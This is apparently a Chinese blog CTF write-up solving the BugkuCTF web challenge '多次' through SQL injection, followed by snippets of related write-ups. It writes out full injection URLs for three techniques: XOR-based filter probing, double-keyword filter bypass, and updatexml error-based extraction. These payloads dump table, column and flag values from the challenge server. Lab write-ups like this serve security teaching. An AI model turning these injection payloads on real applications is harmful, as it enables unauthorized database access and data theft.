BugkuCTF之web题之多次

最新推荐文章于 2024-05-11 02:11:37 发布
最新推荐文章于 2024-05-11 02:11:37 发布
阅读量7.6k 收藏 2
点赞数 6
分类专栏: CTF题 BUGKUCTF 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42967398/article/details/84931839
版权
CTF题 同时被 2 个专栏收录
115 篇文章 16 订阅
订阅专栏
BUGKUCTF
11 篇文章 2 订阅
订阅专栏

BugkuCTF之web题之多次

点击进去发现是:
在这里插入图片描述
看见有个id,一个一个试一试,到id=5时,发现有提示:
在这里插入图片描述
可以确定了,这题是sql注入。

判断一下是什么注入,加上单引号出错,加上#不出错,加上’ and 1=1#又出错了,应该是过滤,这时候我们就要判断一下SQL网站过滤了什么内容,这里有一个很好的方法知道过滤的是什么,使用 异或注入
在id=1后面输入 ‘^(0)^’
发现不出错,那就将0换成1=1
如果出错,那就是成功了
在这里插入图片描述
在这里插入图片描述
发现是可以的。
也就是说,如果括号里面的判断是假的,那么页面就会显示正确
那么同理,如果我修改里面的内容为length(‘union’)!=0
如果页面显示正确,那就证明length(‘union’)是等于0的,也就是union被过滤了
在这里插入图片描述
通过以上的方法可以发现union,select,or,and被过滤了,limit,from没有被过滤。
尝试绕过过滤,既然union这些都是被过滤掉了
那构造ununionion 一旦union被过滤,删除了,那剩下来的还是union,这样就可以起到作用了
在这里插入图片描述
经过测试,用这个方法,确实可以。

最终的payload为
http://123.206.87.240:9004/1ndex.php?id=-1%27%20uniounionn%20selecselectt%201,2%23 发现在2的位置有一个回显
在这里插入图片描述
接下来就是爆库名,爆表,爆列,爆值。。。。

http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,database()%23
http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,group_concat(table_name)%20from%20infoorrmation_schema.tables%20where%20table_schema=%22web1002-1%22%23
http://123.206.87.240:9004/1ndex.php?id=-1%27ununionion%20seselectlect%201,%20group_concat(column_name)%20from%20infoorrmation_schema.columns%20where%20table_schema=%27web1002-1%27%20anandd%20table_name=%27flag1%27%23
http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,flag1%20from%20flag1%23

库名:
在这里插入图片描述
表名:
在这里插入图片描述
两个??肯定查看flag1啦

flag1列名:
在这里插入图片描述
flag1列的值:
在这里插入图片描述
满怀欣喜啊,flag出来啦,赶紧交一波。
错误。。。发现题目:
在这里插入图片描述
难道在address里面??看一下咯!

http://123.206.87.240:9004/1ndex.php?id=-1%27uniunionon%20selselectect%201,address%20from%20flag1%23

发现:
在这里插入图片描述
what???还有下一关???那就继续咯。
点击进入,发现:
在这里插入图片描述
测试时发现暗藏玄机啊,字体是黑色的,坑~~,输入id=1’发现:
在这里插入图片描述
存在SQL注入,并且我们可以从回显中查看哪些被过滤掉了,注意是错误中的显示才是正确的。继续测试看看过滤,发现union,sleep,substr都被过滤掉了
双写无法绕过,大小写无法绕过。
更换函数,利用updatexml报错。

//查表名
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),%27~%27),3)%20%23
//查列名
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27flag2%27),%27~%27),3)%20%23
//查值
http://123.206.87.240:9004/Once_More.php?id=1%27%20and%20updatexml(1,concat(%27~%27,(select%20flag2%20from%20flag2),%27~%27),3)%20%23

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
终于得到了flag啊
赶紧交一下,还是不对!!
难道要两个??原来是小写,坑~~
PS:
这个题其实还有一种解法。。
叫啥布尔盲注,这个目前不知道,下次再说吧!!

A_dmins
关注
  • 6
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 11
    评论
专栏目录
Bugku Web CTF-点击一百万次
No Title
12-10 470
Bugku Web CTF-点击一百万次 目打开是一个巨大的cookie,可点击,并且点击100w次后会给flag。当然点是不可能点的,最开始我的思路是写一个js脚本自动点击,后来看别人的解是自己提交表单。 查看网页源码可得这样一段js代码: <script> var clicks=0 $(function() { $("#cookie") ...
Bugku Web CTF-多次
No Title
12-28 219
Bugku Web CTF-多次 看url构造,可控的值为id: http://123.206.87.240:9004/1ndex.php?id=5 尝试不同数字一直到id=5会提示可以在该页面进行SQL注入。 尝试不同的构造: http://123.206.87.240:9004/1ndex.php?id=5' 提示Error,Error,Error!,但双引号不报错: http://123...
bugku_web_多次
weixin_30642305的博客
10-02 181
这道好难啊、、、多谢大佬的wp 整个页面没有任何可以入手的地方,再看URL:http://120.24.86.145:9004/1ndex.php?id=1 太明显的SQL注入了,然后给id多赋值几次,会发现作者又在各种忽悠我们,不过等到id=5的时候他告诉我们"You can do some SQL injection in here." 然后开始各种注入测试啊:   1、加...
2024年最全CTF BugKu平台—(Web篇①)_ctf bugku web(1),金三银四我带你去BAT面试现场
最新发布
2401_84281698的博客
05-11 693
白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,涵盖了95%以上网络安全知识点,真正体系化!即num既不能是数字字符,但是要等于1,我们可以想到用科学计数法表示数字1,既不是纯数字,其值又等于1因此。这里的sign显示是加密的。这里是zMNTA,这里我好几次都是zM开头的 ==结束的,查看源代码。弱密码top1000?是一个弹窗 F12 找到一些线索,估计是编码,看了一下下面的评论知道是Unicode编码。通过url传入what的值,让其等于flag,直接构造url就得到flag。
Bugku web——多次
qq_40481505的博客
10-15 238
打开链接 首先对id尝试注入单引号和双引号,发现都报错 继续测试,发现下面结果: ?id=1' --+ (显示成功) ?id=1" --+ (显示成功) ?id=1' and 1=1 --+ (显示报错) ?id=1" and 1=1 --+ (显示成功) 猜测sql语句使用的是单引号,且对and继续过滤 使用下面代码验证 ?id=1'^(length('and')!=0)^' (显示成功...
bugku web 多次
realstarstarli的博客
09-06 354
多次 在本中采用一般的sql注入语法好像无法实现sql注入,进而能够解决该所以猜测是因为字段被过滤了 异或为逻辑运算,当两个条件相同(同真或同假)时为假,当两个条件不同时为真。 在mysql中异或用^或xor来表示。 当url为http://123.206.87.240:9004/1ndex.php?id=1’^(length(‘and’)!=0)%23 若and的长度为0(即为被过滤),则^(length(‘and’)!=0)为假,表达式就为id=1异或0=1,页面正常 若and的长度为不为0(即
bugkuctf-WEB
05-04
本文主要针对"bugkuctf-WEB"这一主,结合描述中的CTF菜鸟的解经验分享,深入探讨Web的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku ctf misc wp2.pdf
07-05
bugku ctf misc wp2.pdf
bugku ctf misc wp.pdf
07-05
bugku ctf misc wp.pdf
CTF工具之WEB.zip
10-07
总的来说,这个“CTF工具之WEB.zip”集合了Web安全领域的一系列关键资源,涵盖了从信息收集、漏洞探测到攻击模拟和防御分析等多个环节,对于CTF参赛者或是希望提升Web安全能力的人来说,是一个极其有价值的工具库。...
bugku webINSERT INTO注入.docx
05-16
bugku webINSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
bugku ctf 多次
qq_42777804的博客
08-03 418
打开网站后发现 分别将 id=1 2 3 4 5 有不同的提示,等于6时报错 学到大佬的一个方法, 如何判断过滤了哪些字符? 采用异或注入。 如果括号里面的判断是假的,那么页面就会显示正确 构造 ?id=1'^(length('union')!=0)^' 如果我修改里面的内容为length(‘union’)!=0 如果页面显示正确,...
BugKu-多次
苟有恒,必有三更眠,五更起。
08-06 654
多次链接 http://120.24.86.145:9004 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 这里学习到一个新知识,如何判断过滤了哪些字符? 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么...
Bugku 多次
hhh
03-03 1010
一道SQL注入的目,学习了挺多小知识~ 异或注入 如何判断哪些关键字被过滤 无回显使用脚本盲注 很容易观察到,页面的url中有一个参数id=1,尝试改变这个id的值发现页面发生改变,加单引号出现报错,加上--+后又变成正常页面,于是确定需要进行SQL注入; 异或注入(第一关) 用异或符连接的两个条件,如果两个是相同的(比如同对或者同错),那么就返回正确的页面,否则返回错误; 例如: ...
bugku 多次
小白渣的博客
09-14 163
加粗样式 这分为两个关卡,都是sql注入的。第一关是关键字and、or、union、select过滤,第二关是报错注入。 分析 单引号出错 加上%23,发现不出错了 加上' and 1=1%23 又出错了,应该是过滤了 采用异或判断(即相同的条件即为假) 采用异或注入。 在id=1后面输入 '(0)' 发现不出错,那就将0换成1=1 如果出错,那就是成功了 如果括号里面的判断是假的,那么页面...
Bugku的web目(多次)的解
weixin_30556959的博客
03-07 114
这道目我弄了好久,最后问了朋友,然后在朋友的帮助下,将flag找到了 这里写一下解方法,记录一下 一进到这道,看到了php?id=1,就很熟悉,很有可能是一道sql注入的目,肯定是要试一下最简单的测试,(哪怕知道不可能是什么都没有过滤) 单引号出错 多加一个%23,发现不出错了 加上’ and 1=1%23 又出错了,可能是过滤了,但是不知道过滤了什么 这里有一个很好的方法知道过滤...
BugkuCTF web解析
qq_37078651的博客
03-12 2733
1、简单 查看源码F12: 2、计算器 输入发现只能输入一个字符,遂查看源码修改maxlength值或者删掉。 3、web基础$_GET GET请求参数what==flag即可. 4、web基础$_POST 使用工具(我用的是hackbar)发送post请求 参数what=flag。 5、矛盾 $num=$_GET['num']; if(!is_nu...
bugku-Web-多次(异或注入,判断被过滤的关键字)☆
Sea_Sand息禅
12-13 905
进去看到url感觉是sql注入, 加上',报错但是%23不报错,加上'--+,也不报错,说明可以用--+注释 加上' or 1=1--+,报错 尝试' oorr 1=1--+,正常 说明or被过滤了. 那么怎么判断哪些关键字被过滤了呢,这里用到异或注入(同真异假)。 http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0...
BugkuCTF Web部分的几道
Sandra_93的博客
10-22 467
url解码:url编码,由%和数字构成 将代码用url进行解码, var p1 = ‘function checkSubmit(){ var a=document.getElementById(“password”); if(“undefined”!=typeof a){ if(&amp;amp;amp;quot;67d709b2b’; var p2 = ‘aa648cf6e87a7114f1&amp;amp;amp;quot;==a.value) return!...
BugkuCTF 字符?正则?
08-11
因此,在BugkuCTF中,对字符处理和正则表达式的理解和熟练应用是非常重要的技能之一。参赛者需要具备对字符编码、字符串操作、基本正则表达式语法等方面的知识,并能够灵活运用这些技巧来解决各种与字符和正则相关的...
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值